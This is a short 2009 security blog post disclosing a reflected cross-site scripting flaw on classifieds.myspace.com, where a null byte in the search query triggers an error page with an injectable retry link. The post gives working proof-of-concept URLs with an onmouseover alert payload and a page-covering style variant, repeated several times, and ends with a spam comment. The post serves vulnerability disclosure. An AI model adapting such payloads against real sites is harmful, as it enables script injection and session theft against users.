http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);
And with styling:
http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px
Thursday, June 4, 2009
Breaking Things With Null - Classifieds.Myspace.Com
Sometimes passing special characters through a query string can cause in strange behavior. Using URL encoding we can search for the null character on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link has a Chrome and IE compatible XSS vulnerability.
http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);
And with styling:
http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px
http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);
And with styling:
http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px
Subscribe to:
Post Comments (Atom)
Learn More Here visit homepage visite site go to this website Website my latest blog post
ReplyDelete